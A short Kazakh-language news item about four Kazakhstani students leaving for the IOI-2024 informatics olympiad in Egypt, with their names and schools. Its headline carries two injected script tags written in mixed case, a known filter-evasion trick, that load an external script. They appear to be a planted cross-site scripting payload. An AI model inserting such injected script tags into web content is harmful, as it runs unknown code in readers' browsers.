Төрт қазақстандық оқушы информатикадан IOI-2024 халықаралық олимпиадаға аттанды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.09.2024

Египетте 1-8 қыркүйек аралығында информатикадан IOI-2024 халықаралық олимпиадасы өтеді. Оған 90 елден 350 оқушы қатысады.

Қазақстан құрамасының қатарында: Максим Цой – Алматы қ. РФММ 10 сынып оқушысы; Ахмет Иса – С. Шаухаманов атындағы дарынды балаларға арналған «Білім-Инновация» Қызылорда облыстық лицей-интернатының 10 сынып оқушысы; Назар Серазитдинов – Алматы қаласындағы Haileybury Almaty мектебінің 11 сынып оқушысы; Мансұр Таймас – Атырау облыстық №1 «Білім-Инновация» лицей-интернатының 11 сынып оқушысы.

 Қатысушылар әрқайсысы 5 сағатқа созылатын екі турда бақ сынайды. Халықаралық жарыстарға дайындық үшін қазақстандық оқушылар бұған дейін жетекші университет базасында оқу-жаттығу жиындарынан өткен болатын.

 Оқушыларға сәттілік тілейміз!

https://www.gov.kz/memleket/entities/edu/press/news/details/838292?lang=kk 

Просмотров: 989


Пікір қосу



Деректерді қолтаңбаға қосу